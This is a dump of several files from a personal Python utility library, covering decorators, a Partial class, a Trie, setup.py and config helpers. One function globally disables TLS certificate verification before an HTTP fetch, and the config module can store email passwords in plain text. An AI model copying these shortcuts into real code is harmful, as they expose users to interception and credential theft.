with temporary_globals(func, **kwargs):
res = func(**kwargs)
return res
return wrapper
return decorator
@valuecheck
def function_interface(present=(), required=(), defaults=(), startswith=(),
args: (True, False, None)=None,
kwargs: (True, False, None)=None,
like_func=None):
"""Decorator factory to enforce a some kind of function signature interface
(i.e. the first two arguments must be ('model', 'x') or the function must
accept **kwargs or the parameter 'learning_rate' must be present but not
required because it has a default value).
Parameters
----------
present: Iterable[str]
List of parameter names that must be present in the function signature.
This will not check anything about their order or if they're required,
just that they're present.
required: Iterable[str]
List of names that must be required parameters in the function (i.e.
they have no default value).
defaults: Iterable[str]
List of names that must be present in the function signature with
default values.
startswith: Iterable[str]
List of names that the function signature must start with. Order
matters.
args: bool
If True, require function to accept *args. If False, require that it
doesn't. If None, don't check either way.
kwargs: bool
If True, require function to accept **kwargs. If False, require that it
doesn't. If None, don't check either way.
like_func: None or function
If provided, this function's signature will define the interface that
all future decorated functions must match. Their name will obviously
be different but all parameters must match (that means names, order,
types, defaults, etc.).
Returns
-------
"""
def decorator(func):
def _param_status(param, params):
if param not in params:
return 'missing'
if params[param].default == inspect._empty:
return 'required'
return 'optional'
params = signature(func).parameters
name = func_name(func)
for param in present:
if param not in params:
raise RuntimeError(
f'`{name}` signature must include parameter {param}.'
)
for param in required:
if _param_status(param, params) != 'required':
raise RuntimeError(
f'`{name}` signature must include parameter {param} with '
'no default parameter.'
)
for param in defaults:
if _param_status(param, params) != 'optional':
raise RuntimeError(
f'`{name}` signature must include parameter {param} with '
'default value.'
)
params_list = list(params.keys())
for i, param in enumerate(startswith):
if params_list[i] != param:
raise RuntimeError(f'`{name}` signature\'s parameter #{i+1} '
f'(1-indexed) must be named {param}.')
if args is not None:
has_args = any(v.kind == Parameter.VAR_POSITIONAL
for v in params.values())
if has_args != args:
raise RuntimeError(f'`{name}` signature must '
f'{"" if args else "not"} accept *args.')
if kwargs is not None:
has_kwargs = any(v.kind == Parameter.VAR_KEYWORD
for v in params.values())
if has_kwargs != kwargs:
raise RuntimeError(
f'`{name}` signature must {"" if kwargs else "not"} '
'accept **kwargs.'
)
if like_func and str(signature(like_func)) != str(signature(func)):
raise RuntimeError(f'`{name}` signature must match {like_func} '
'signature.')
@wraps(func)
def wrapper(*args, **kwargs):
return func(*args, **kwargs)
return wrapper
return decorator
def Lazy(func=None, *, lazy=True):
""""Decorator that provides a function with a boolean parameter "lazy".
When set to true, the function will not be executed yet, sort of like a
coroutine (see examples). This can be nice for testing purposes. Also
opens the door to some interesting things (maybe sort of allows for
decorated objects? Not sure of all applications yet). Would have preferred
a lowercase function name but I also want to keep the parameter name as
"lazy" while avoiding confusion.
Examples
--------
@Lazy
def foo(a, b=3):
return a * b
>>> foo(2, lazy=False)
6
>>> res = foo(2)
>>> res()
6
In the second example, notice we didn't get any output until explicitly
calling the result. Also note that we can change the default mode by using
the decorator like (keyword argument, not positional):
@Lazy(lazy=False)
"""
if func is None: return partial(Lazy, lazy=lazy)
if 'lazy' in params(func):
raise RuntimeError(
f'Decorated function {func} must not have parameter named "lazy".'
'It will be inserted automatically.'
)
@wraps(func)
def wrapper(*args, lazy=lazy, **kwargs):
if lazy:
return lambda: func(*args, **kwargs)
return func(*args, **kwargs)
return wrapper
def mark(**kwargs):
"""Decorator to mark a function or method with various attributes. For
example, we might want to mark all methods of a class that are called
internally by a particular method, or all the methods that are used for
feature engineering, or all the methods that make http calls.
Parameters
----------
kwargs: (str, any)
These will be used to set attributes of the function or method.
Examples
--------
class FooBar:
@mark(http=True, priority=1)
def foo(self, x):
...
@mark(priority=2)
def bar(self, x):
...
"""
def decorator(func):
for k, v in kwargs.items():
setattr(func, k, v)
@wraps(func)
def wrapper(*args, **kwargs_):
return func(*args, **kwargs_)
return wrapper
return decorator
def coroutine(coro):
"""Decorator to prime a coroutine (lets us avoid calling coro.send(None)
before sending actual values).
"""
@wraps(coro)
def wrapper(*args, **kwargs):
# Note that this is only executed once when we first create the
# coroutine - subsequent interactions use `send` on the existing
# object.
res = coro(*args, **kwargs)
res.send(None)
return res
return wrapper
@counted
def in_standard_library(package_name):
"""Define this in `meta` module since we require the `counted` decorator
so we only make the http request the first time we execute the function
(had trouble getting packaging arg `data_files` in setup.py to work as
expected). Useful for determining what pip packages need to be installed in
a project (if a package isn't built in, we presumably need to install it).
Note to self: we could also implement this like:
@mark(library=StandardLibrary())
def in_standard_library(package_name):
return package_name in in_standard_library.library
where StandardLibrary is a class with a cached_property-decorated method
to fetch the library list and a __contains__ method that delegates checks
to the resulting attribute produced by the descriptor. Still deciding which
pattern I prefer for the "do something on the first call" use case.
Parameters
----------
package_name: str
Name of a package, e.g. numpy.
Returns
-------
bool: True if package is included in the standard library, False otherwise.
"""
global STANDARD_LIBRARY
if in_standard_library.call_count == 0:
# Brew-installed versions of python sometimes don't include the
# necessary certificate for http requests to work.
ssl._create_default_https_context = ssl._create_unverified_context
r = urllib.request.urlopen(STD_LIB_GIST)
STANDARD_LIBRARY = json.loads(r.read())
return package_name in STANDARD_LIBRARY
def get_module_docstring(path, default=''):
"""Got the module level docstring from a python file.
Parameters
----------
path: str or Path
File to extract docstring from. You can also pass in __file__ to get
the current file.
default: str
Backup value when module has no docstring.
Returns
-------
str
"""
with open(path, 'r') as f:
tree = ast.parse(f.read())
return ast.get_docstring(tree) or default
def getindex(arr, val, default=-1):
"""Like list.index but allows us to specify a fallback value if the value
isn't present in the list, kind of like getattr.
Parameters
----------
arr: list
The list to search in.
val: any
The item to search for.
default: any
Value to return if val is not in arr.
"""
return arr.index(val) if val in arr else default
def set_module_global(module, key, value):
"""Create global variable in an imported module. This is a slightly hacky
workaround that solves some types of circular imports.
Parameters
----------
module: str
Name of module to create variable in.
key: str
Name of variable to create in module.
value: any
Value of variable to create in module.
"""
module_ = sys.modules[module]
if hasattr(module_, key):
warnings.warn(f'{module} has existing variable {key} that will be '
f'overwritten.')
setattr(module_, key, value)
def set_module_globals(module, **kwargs):
"""Set multiple global variables in an imported module.
Parameters
----------
module: str
Module name.
kwargs: any
(Key, value) pairs.
"""
for k, v in kwargs.items():
set_module_global(module, k, v)
class Partial:
"""More powerful (though also potentially more fragile) version of
functools.partial that updates the resulting signature to work better with
Jupyter's quick documentation feature. We also update __repr__, __str__,
and __name__ attributes (optionally renaming the source function). Unlike
functools.partial, we also reorder parameters so that those without
defaults always come before those with defaults.
Note: the resulting object is actually a callable class, not a function.
"""
def __init__(self, func, name=None, **kwargs):
"""
Parameters
----------
func: function
name: str or None
If None, the source function's name will be used.
kwargs: any
Default arguments to set, like in functools.partial.
"""
self.func = copy_func(func)
self.old_name = func.__name__
# Track names of positional args in old function since this affects
# the order args must be passed in if var_positional parameters
# (*args) are present.
self.old_pos_pars = []
self.kwargs_name = ''
self.args_name = ''
new_pars = []
old_sig = signature(self.func)
for k, v in old_sig.parameters.items():
# Check parameter kind for error handling and argument resolution
# in __call__.
if v.kind == 0:
raise NotImplementedError(
'rigorous_partial does not support functions with '
'positional only parameters.'
)
elif v.kind == 2:
self.args_name = k
elif v.kind == 4:
self.kwargs_name = k
break
if v.kind <= 2:
self.old_pos_pars.append(k)
# Assign default value from newly specified kwargs if provided.
if k in kwargs:
default = kwargs.pop(k)
kind = 3
else:
default = v.default
kind = v.kind
param = Parameter(k, kind, default=default)
new_pars.append(param)
# Remaining kwargs only: those that were not present in func's
# signature. Require that they be keyword only since ordering can
# cause issues (updating signature affects what we see but doesn't
# seem to affect the actual order args are passed in, presumably due
# to old __code__ object).
for k, v in kwargs.items():
param = Parameter(k, 3, default=v)
new_pars.append(param)
if self.kwargs_name:
new_pars.append(Parameter(self.kwargs_name, 4))
# Ensure we don't accidentally place any parameters with defaults
# ahead of those without them. Third item in tuple is a tiebreaker
# (defaults to original function's parameter order).
old_names = [p for p in old_sig.parameters]
new_pars.sort(
key=lambda x: (x.kind, x.default != _empty,
getindex(old_names, x.name, float('inf')))
)
# I honestly forget why we need to set the attribute on self.func too,
# I just remember it was needed to resolve a bug (I think it was
# related to *args resolution).
self.__signature__ = self.func.__signature__ = old_sig.replace(
parameters=new_pars
)
self.__defaults__ = tuple(p.default for p in new_pars if p.kind < 3
and p.default != _empty)
self.__kwdefaults__ = {p.name: p.default for p in new_pars
if p.kind == 3}
if name: self.func.__name__ = name
update_wrapper(self, self.func)
def __call__(self, *args, **new_kwargs):
# Remember self.func's actual code is unchanged: we updated how its
# signature appears, but that doesn't affect the actual mechanics.
# Therefore, we need to carefully resolve args and kwargs so that the
# function is called so that behavior matches what we'd expect based
# on the order shown in the signature.
tmp_kwargs = bound_args(self.func, args,
{**self.__kwdefaults__, **new_kwargs})
final_args = {name: tmp_kwargs.pop(name)
for name in self.old_pos_pars}
final_star_args = final_args.pop(self.args_name, [])
final_kwargs = select(tmp_kwargs, drop=list(final_args))
return self.func(*final_args.values(), *final_star_args,
**final_kwargs)
def __repr__(self):
"""Note: the memory address here points to that of the copy of the
source function stored in self.func.
"""
return repr(self.func).replace(self.old_name, self.__name__)
def __str__(self):
return str(self.func).replace(self.old_name, self.__name__)
class OwnerAwareAttrsMixin:
"""Mixin class that makes instance variables "aware" of the instance they
belong to (when possible). This may be easier to illustrate by example:
class Trainer(OwnerAwareAttrsMixin):
def __init__(self, model, out_dir):
self.model = model
self.out_dir = out_dir
>>> trainer = Trainer(model, 'models/1.0.0')
>>> trainer.model.owner
<__main__.Trainer at 0x7fc9e212d860>
>>> trainer.out_dir.owner
AttributeError: 'str' object has no attribute 'parent'
>>> trainer._owner_aware_attrs
{'model'}
"""
_aware_attrs_name = '_owner_aware_attrs'
def __setattr__(self, key, val):
super().__setattr__(key, val)
if not hasattr(self, self._aware_attrs_name):
setattr(self, self._aware_attrs_name, set())
try:
setattr(val, 'owner', self)
getattr(self, self._aware_attrs_name).add(key)
except:
pass
class ReturningThread(Thread):
"""
# TODO: consider creating a separate concurrency.py module? Have to
consider dependencies, e.g. this uses meta.add_docstring, so meta.py would
not be able to use functionality from concurrency.py.
"""
@add_docstring(Thread)
def __init__(self, group=None, target=None, name=None,
args=(), kwargs=None, *, daemon=None):
"""This is identical to a regular thread except that the join method
returns the value returned by your target function. The
Thread.__init__ docstring is shown below for the sake of convenience.
"""
super().__init__(group=group, target=target, name=name,
args=args, kwargs=kwargs, daemon=daemon)
self.result = None
def run(self):
self.result = self._target(*self._args, **self._kwargs)
def join(self, timeout=None):
super().join(timeout)
return self.result
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,147 | hdmamin/htools | refs/heads/master | /htools/__init__.py | from htools.core import *
from htools.meta import *
from htools import pd_tools
from htools.structures import *
__version__ = '7.7.0'
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,148 | hdmamin/htools | refs/heads/master | /setup.py | import os
from setuptools import setup, find_packages
def requirements(path='requirements.txt'):
with open(path, 'r') as f:
deps = [line.strip() for line in f]
return deps
def version(path=os.path.join('htools', '__init__.py')):
with open(path, 'r') as f:
for row in f:
if not row.startswith('__version__'):
continue
return row.split(' = ')[-1].strip('\n').strip("'")
setup(
name='htools',
version=version(),
description='Harrison\'s custom functions.',
packages=find_packages(include=['htools']),
author='Harrison Mamin',
zip_safe=False,
install_requires=requirements(),
# If installing speedup causes gcc error in docker image, try
# adding `apt install build-essentials`.
# TODO: maybe move this dep out of extras. Fuzzywuzzy gets imported by
# meta module so it's not really optional anymore.
extras_require={'fuzzy': ['fuzzywuzzy'],
'speedup': ['fuzzywuzzy[speedup]']},
entry_points={'console_scripts': ['htools=htools.cli:cli']}
)
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,149 | hdmamin/htools | refs/heads/master | /notebooks/scratch_trie_with_attrs.py | """
Want to eventually add support for trie with word-level and maybe char-level
attributes. Ex: word embeddings, word frequencies, char->char transition probs,
parts of speech, etc.). Also experimenting with a slightly different interface
than the existing trie in htools. Note that names are the same so if you import
htools * in a notebook, things may get confusing. Might want to rename these.
"""
from htools.core import listlike
class TrieNode:
def __init__(self, edges=None, is_terminal=False, is_root=False, **kwargs):
self.edges = edges or {}
self.is_terminal = is_terminal
self.is_root = is_root
self.kwarg_names = set(kwargs)
self.set_kwargs(**kwargs)
def set_kwargs(self, **kwargs):
self.kwarg_names.update(kwargs.keys())
self.__dict__.update(**kwargs)
def __contains__(self, char):
return char in self.edges
def __getitem__(self, char):
return self.edges[char]
def __setitem__(self, char, val):
self.edges[char] = val
def __repr__(self):
res = f'TrieNode(edges={list(self.edges)}, '\
f'is_terminal={self.is_terminal}, ' \
f'is_root={self.is_root}'
if self.kwarg_names:
kwarg_str = ', '.join(f'{kwarg}={getattr(self, kwarg)}'
for kwarg in self.kwarg_names)
res += ', ' + kwarg_str
return res + ')'
class Trie:
def __init__(self, vocab=None):
self.root = TrieNode(is_root=True)
self._initialize(vocab)
def _initialize(self, vocab):
# Case 1: vocab is list/tuple. Must assign empty kwargs.
if listlike(vocab):
vocab = {word: {} for word in vocab}
# Case 2: vocab is dict but values are not dicts. Must assign default name.
elif not isinstance(next(iter(vocab.values())), dict):
vocab = {word: {'val': val} for word, val in vocab.items()}
for word, kwargs in vocab.items():
self.add(word, **kwargs)
def add(self, word, **kwargs):
# These kwargs are associated with the whole word, e.g. if you want to
# pass in word counts or word embeddings. Still need to implement support
# for character-level attributes if I want that (e.g. if we want some kind of
# transition probability from 1 character to the next).
node = self.root
for char in word:
if char not in node:
node[char] = TrieNode()
node = node[char]
node.is_terminal = True
node.set_kwargs(**kwargs)
def update(self, words):
for word in words:
self.add(word)
# TODO - eventually want method that yields nodes as we add/search for a new
# word. Based on my coroutine/generator pattern. Still debugging.
def _find(self, word):
node = self.root
yield
for char in word:
cur = yield node
print('1', 'cur', cur, 'node', node)
if cur:
node = cur.get(char)
print('2', 'cur', cur, 'node', node)
if __name__ == '__main__':
word_dict = {
'app': 18,
'a': 6,
'apple': 17,
'about': 4,
'able': 6,
'zoo': 13,
'zen': 11,
'zesty': 14,
'apply': 4,
'cow': 18,
'zigzag': 12
}
t = Trie(word_dict)
coro = _find(t, 'app')
print(next(coro))
for x in coro:
coro.send(x)
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,150 | hdmamin/htools | refs/heads/master | /htools/config.py | import os
# Need to update this periodically. Could find standard library automatically
# if we add beautifulsoup dependency but html parsing logic rarely lasts long
# anyway. `data_files` argument in setup.py was not cooperating.
STD_LIB_GIST = 'https://gist.githubusercontent.com/hdmamin/' \
'5c766f9cbfb9e98a151e57086cf3ee36/raw/' \
'3955ab460f50be18e86846c4dd380b19947042f5/standard_library.json'
CONFIG_DIR = os.path.expanduser(os.path.join('~', '.htools'))
CREDS_FILE = os.path.join(CONFIG_DIR, 'credentials.csv')
CONFIG_FILE = os.path.join(CONFIG_DIR, 'config.csv')
def get_default_user():
"""Get user's default email address. If one has not been set, user has the
option to set it here.
Returns
--------
str or None: A string containing the default email address. If user
declines to specify one, None is returned.
"""
os.makedirs(CONFIG_DIR, exist_ok=True)
try:
with open(CONFIG_FILE, 'r') as f:
email = f.read().strip()
return email
except FileNotFoundError:
cmd = input('No source email was specified and no default exists. '
'Would you like to add a default? [y/n]\n')
if cmd == 'y':
email = input('Enter default email address:\n')
with open(CONFIG_FILE, 'w') as f:
f.write(email)
return email
else:
print('Exiting (no email specified).')
return None
def get_credentials(from_email):
"""Get the user's password for a specified email address.
Parameters
----------
from_email: str
The email address to get the password for.
Returns
-------
str or None: If a password is found for the specified email address, return
it as a string. Otherwise, return None.
"""
# Load credentials.
os.makedirs(CONFIG_DIR, exist_ok=True)
try:
with open(CREDS_FILE, 'r') as f:
creds = dict([line.strip().split(',') for line in f])
return creds[from_email]
except Exception:
cmd = input('We could not find credentials for that email '
'address. Would you like to enter your credentials '
'manually? [y/n]\n')
# Case 1: User enters password manually.
if cmd == 'y':
password = input('Enter password:\n')
cmd2 = input('Would you like to save these credentials locally '
'(if so, htools will remember your password next '
'time)? [y/n]\n')
if cmd2 == 'y':
with open(CREDS_FILE, 'a') as f:
f.write(f'{from_email},{password}\n')
print(f'File saved to {CREDS_FILE}.')
return password
print('Exiting (no credentials given).')
return None
| {"/htools/magics.py": ["/htools/meta.py"], "/htools/meta.py": ["/htools/core.py", "/htools/config.py"], "/htools/__init__.py": ["/htools/core.py", "/htools/meta.py", "/htools/structures.py"], "/notebooks/scratch_trie_with_attrs.py": ["/htools/core.py"], "/htools/structures.py": ["/htools/core.py", "/htools/meta.py"], "/htools/core.py": ["/htools/config.py"], "/htools/cli.py": ["/htools/core.py", "/htools/meta.py"], "/htools/autodebug.py": ["/htools/meta.py"], "/htools/pd_tools.py": ["/htools/core.py", "/htools/__init__.py"]} |
78,151 | hdmamin/htools | refs/heads/master | /htools/structures.py | from collections import namedtuple, OrderedDict, Iterable
from copy import deepcopy
from datasketch import MinHash, MinHashLSHForest
from functools import partial
from fuzzywuzzy import fuzz, process
from heapq import heappop, heappush
from multipledispatch import dispatch
from numbers import Integral
import numpy as np
from tqdm.auto import tqdm
import warnings
from htools.core import ngrams, tolist, identity, func_name, listlike, select,\
parallelize
from htools.meta import add_docstring
def Args(**kwargs):
"""Wrapper to easily create a named tuple of arguments. Functions sometimes
return multiple values, and we have a few options to handle this: we can
return them as a regular tuple, but it is often convenient to be able to
reference items by name rather than position. If we want the output to be
mutable, we can return a dictionary, but this still requires more space
than a tuple and bracket notation is arguably less convenient than dot
notation. We can create a new namedtuple inside the function, but this
kind of seems like overkill to create a new type of namedtuple for each
function.
Instead, this lets us create a namedtuple of Args on the fly just as easily
as making a dictionary.
Parameters
----------
Examples
--------
def math_summary(x, y):
sum_ = x + y
prod = x * y
diff = x - y
quotient = x / y
return Args(sum=sum_,
product=prod,
difference=diff,
quotient=quotient)
>>> results = math_summary(4, 2)
>>> results.product
8
>>> results.quotient
2
>>> results
Args(sum=6, product=8, difference=2, quotient=2)
"""
args = namedtuple('Args', kwargs.keys())
return args(*kwargs.values())
class TrieNode:
"""Single node in a Trie. Most of the functionality is provided in Trie
class rather than here.
"""
def __init__(self, data=(), depth=0):
"""
Parameters
----------
data: Iterable or Iterable[Iterable]
One or more sequences to add to the node. This could be a string,
a list of strings, a list of tuples of ints, etc.
"""
self.edges = {}
self.stop_state = False
self.depth = depth
for x in tolist(data):
self.append(x)
def append(self, seq):
if not seq:
self.stop_state = True
return
x = seq[0]
if x not in self.edges:
self.edges[x] = TrieNode(depth=self.depth + 1)
self.edges[x].append(seq[1:])
def __repr__(self):
return f'{type(self).__name__}({list(self.edges.keys()) or ""})'
class Trie:
"""Memory-efficient data structure for highly duplicated sequence data. For
example, this would be a nice way to store a dictionary since many words
overlap (e.g. can, cannot, cannery, canning, cane, and cannon all share the
first 3 letters. With Trie, the common prefix is stored only once.).
Checking if a sequence is present is therefore O(n) where n is the length
of the input sequence. Notice this is unaffected by the number of values in
the Trie.
"""
def __init__(self, values=(), suffix=False, node_cls=TrieNode):
"""
Parameters
----------
values: str or list-like Iterable
If provided, this should be one or more sequences to add to the
try. Sequences could be strings, lists of strings (like word
tokens), tuples of integers, etc. As of Dec 2020, this should NOT
be numpy arrays or torch tensors.
"""
self.node_cls = node_cls
self.head = node_cls()
if suffix:
self._maybe_reverse = lambda x: x[::-1]
else:
self._maybe_reverse = identity
self.suffix = suffix
# dtype records the type of object present in the trie, and is a
# string rather than a type because lolviz library has a
# bug when displaying type attributes. Its visualizations are very
# helpful here so I don't want to break compatibility.
self.dtype = ''
self.child_dtype = ''
self.postprocess = None
# Use extend rather than passing values directly to TrieNode because
# that won't give us validation or preprocessing.
self._length = 0
self.extend(tolist(values))
def append(self, seq):
"""Add a sequence to the trie. This operates in place."""
if not self.postprocess:
self.dtype = type(seq).__name__
self.child_dtype = type(seq[0]).__name__
self.postprocess = partial(str.join, '') if self.dtype == 'str' \
else identity
else:
self._validate_input(seq)
self.head.append(self._maybe_reverse(seq))
self._length += 1
def extend(self, seqs):
"""Add a list-like group of sequences to the Trie."""
for seq in seqs:
self.append(seq)
def __add__(self, seq):
"""Allows us to add items to a trie using + operator. This does not
alter the trie in place: to do that, use `append` or assign the result
of this method back to your variable.
Returns
-------
Trie
"""
clone = deepcopy(self)
clone.append(seq)
return clone
def _find(self, seq, node=None):
"""Try to find a a sequence in the trie. We provide this helper method
rather than doing it entirely in __contains__ in case other methods
want to make use of the found node (perhaps passing it to
self._values.)
Returns
-------
TrieNode: If node.stop_state=True, the seq is in the trie. If False,
it's not.
"""
self._validate_input(seq)
seq = self._maybe_reverse(seq)
node = node or self.head
for x in seq:
if x not in node.edges:
# Return this so __contains__ can check its stop state.
return self.node_cls()
node = node.edges[x]
return node
def __contains__(self, seq):
"""Check if a sequence is present in the trie.
Returns
-------
bool
"""
return self._find(seq).stop_state
def _values(self, current=None, node=None):
"""Generator that yields each sequence in the tree one by one. Don't
rely on the order, but I believe it should be a depth first traversal
where the order of subtries traversed is determined by insertion
order. See examples.
Parameters
----------
current: list or None
List of partial sequence currently being retrieved. This is used
internally but should rarely need to be called by the user.
node: TrieNode or None
The node to retrieve values from. By default, we use the root
node, thereby retrieving values for the whole trie.
Examples
--------
>>> t = Trie(['add', 'subtract', 'addition', 'multiply', 'adds'])
>>> for v in t._values():
print(v)
add
addition
adds
subtract
multiply
"""
node = node or self.head
current = current or []
if node.stop_state:
# Here, reversal is more of a postprocessing step than a
# preprocessing one: we're converting the reversed word stored in
# the suffix tree back to its original order.
yield self._maybe_reverse(self.postprocess(current))
for key, node_ in node.edges.items():
yield from self._values(current + [key], node_)
def __iter__(self):
"""We separate this from self._values because we want the latter to
be callable with arguments.
"""
yield from self._values()
def values(self):
"""Get a list of all sequences in the trie. User-facing version of
`_values` that returns a list rather than a generator. User can also
simply call `list(my_trie)` and get the same result.
"""
return list(self)
def __len__(self):
# Don't just delegate to `self.values()` because __len__ is called
# under the hood by list(self), thereby creating a recursion error in
# `self.values()`. Could do `sum(1 for _ in self) but that gets slow
# with large tries. There's currently no way to delete items so we
# don't have to worry about length changing outside of `append`, and
# if we do implement that we can simply adjust _length accordingly.
return self._length
def _startswith(self, seq, node=None):
"""Base behavior for both `startswith` and `endswith`.
"""
# Validation occurs in `_find`.
node = self._find(seq, node=node)
if self.suffix:
return [x + seq for x in self._values(node=node)]
else:
return [seq + x for x in self._values(node=node)]
def startswith(self, seq, node=None):
"""Gets all values in a trie that start with a given sequence. (Unlike
str.startswith, this does NOT return a boolean - consider renaming in
a future version.)
Parameters
----------
seq: Iterable
Same type as all the other sequences in the trie.
node: TrieNode
If provided, only the subtrie starting with this node will be
searched. Defaults to the head, i.e. the whole trie will be
searched.
Returns
-------
list: Each item will be one of the sequences in the trie. If an empty
list is returned, the trie contains no items sharing any leading
values with the input `seq`.
"""
if self.suffix:
warnings.warn(
'Suffix trees are optimized for the `endswith` method, but '
'`startswith` will require walking the whole trie (may be '
'slow). For an efficient implementation of `startswith`, you '
'can create a prefix tree by passing `suffix=False` to '
'Trie.__init__.'
)
if self.dtype == 'str':
return [v for v in self._values(node=node)
if v.startswith(seq)]
else:
self._validate_input(seq)
length = len(seq)
return [v for v in self._values(node=node)
if v[:length] == seq]
return self._startswith(seq, node=node)
def endswith(self, seq, node=None):
"""Gets all values in a trie that end with a given sequence. (Unlike
str.endswith, this does NOT return a boolean - consider renaming in
a future version.)
Parameters
----------
seq: Iterable
Same type as all the other sequences in the trie.
node: TrieNode
If provided, only the subtrie starting with this node will be
searched. Defaults to the head, i.e. the whole trie will be
searched.
Returns
-------
list: Each item will be one of the sequences in the trie. If an empty
list is returned, the trie contains no items sharing any trailing
values with the input `seq`.
"""
if not self.suffix:
warnings.warn(
'Prefix trees are optimized for the `startswith` method, but '
'`endswith` will require walking the whole trie (may be '
'slow). For an efficient implementation of `endswith`, you '
'can create a suffix tree by passing `suffix=True` to '
'Trie.__init__.'
)
if self.dtype == 'str':
return [v for v in self._values(node=node)
if v.endswith(seq)]
else:
self._validate_input(seq)
length = len(seq)
return [v for v in self._values(node=node)
if v[-length:] == seq]
return self._startswith(seq, node=node)
def _longest_common_prefix(self, seq, seen):
"""Base functionality for the efficient version of
`longest_common_prefix` for prefix trees and `longest_common_suffix`
for suffix trees.
Parameters
----------
seq: Iterable
Input sequence for which you wish to find sequences with matching
prefixes (or suffixes). Type must match that of the other
sequences in the trie.
seen: list
Empty list passed in. Seems to be necessary to accumulate matches.
Returns
-------
list: Each item in the list is of the same tyep as `seq`. An empty
list means no items in the tree share a common prefix with `seq`.
"""
# Validation and reversal happens in `startswith`.
matches = self.endswith(seq) if self.suffix else self.startswith(seq)
if matches: return matches
node = self.head
for i, x in enumerate(self._maybe_reverse(seq)):
if x in node.edges:
seen.append(x)
node = node.edges[x]
elif i == 0:
# Otherwise, all values are returned when the first item is
# not in the trie.
return []
else:
seen = self._maybe_reverse(self.postprocess(seen))
if self.suffix:
matches = [v + seen for v in self._values(node=node)]
else:
matches = [seen + v for v in self._values(node=node)]
# Otherwise, we get bug where an empty list is returned if
# the longest matching prefix is a complete sequence and the
# node has no edges.
if node.stop_state and not matches:
matches.append(seen)
return matches
# Case where the input sequence is present in the trie as a complete
# sequence and it has no edges. This cannot be combined with the
# case in the else statement above where matches is empty. We avoid
# handling this upfront with something like
# `if seq in self: return [seq]` because we want to capture additional
# valid sequences in present.
if node.stop_state:
return [self._maybe_reverse(self.postprocess(seen))]
def longest_common_prefix(self, seq):
"""Find sequences that share a common prefix with an input sequence.
For instance, "carry" shares a common prefix of length 3 with "car",
"carton", and "carsick", a common prefix of length 1 with "chat", and
no common prefix with "dog". Note that a word shares a common prefix
with itself, so if it's present in the trie it will be returned (in
addition to any words that begin with that substring: for instance,
both "carry" and "carrying" share a common prefix of length 5 with
"carry".)
Parameters
----------
seq: Iterable
Input sequence for which you wish to find sequences with matching
prefixes. Type must match that of the other
sequences in the trie.
Returns
-------
list: Each item in the list is of the same tyep as `seq`. An empty
list means no items in the tree share a common prefix with `seq`.
"""
# Validation occurs in self.startswith, often via self._find.
if not self.suffix:
return self._longest_common_prefix(seq, [])
warnings.warn(
'Suffix trees are optimized for the `longest_common_suffix` '
'method, but `longest_common_prefix` will require walking '
'the whole trie (may be slow). For an efficient implementation '
'of `longest_common_prefix`, you can create a prefix tree by '
'passing `suffix=False` to Trie.__init__.'
)
self._validate_input(seq)
res = []
for i in range(len(seq), 0, -1):
for v in self._values():
if v[:i] == seq[:i]: res.append(v)
if res: break
return res
def longest_common_suffix(self, seq):
"""Find sequences that share a common suffix with an input sequence.
For instance, "carry" shares a common prefix of length 2 with "story",
"tawdry", and "ornery", a common suffix of length 1 with "slowly", and
no common suffix with "hate". Note that a word shares a common suffix
with itself, so if it's present in the trie it will be returned (in
addition to any words that end with that substring: for instance, both
"carry" and "miscarry" share a common suffix of length 5 with
"carry".)
Parameters
----------
seq: Iterable
Input sequence for which you wish to find sequences with matching
suffixes. Type must match that of the other sequences in the trie.
Returns
-------
list: Each item in the list is of the same tyep as `seq`. An empty
list means no items in the tree share a common prefix with `seq`.
"""
# Validation and reversal occur in self.endswith, often via
# self._find.
if self.suffix:
return self._longest_common_prefix(seq, [])
warnings.warn(
'Prefix trees are optimized for the `longest_common_prefix` '
'method, but `longest_common_suffix` will require walking the '
'whole trie (may be slow and memory intensive). For an '
'efficient implementation of `longest_common_suffix`, you can '
'create a suffix tree by passing `suffix=True` to Trie.__init__.'
)
self._validate_input(seq)
res = []
for i in range(len(seq), 0, -1):
for v in self._values():
if v[-i:] == seq[-i:]: res.append(v)
if res: break
return res
def _validate_input(self, seq):
"""This should occur before calling self._maybe_reverse. Seq must be
the same type as the other items in the trie or an error will be
raised.
"""
if type(seq).__name__ != self.dtype:
raise TypeError('`seq` type doesn\'t match type of other '
'sequences.')
if type(seq[0]).__name__ != self.child_dtype:
raise TypeError('Type of first item in `seq` doesn\'t match type '
'of first item in other sequences.')
def flip(self):
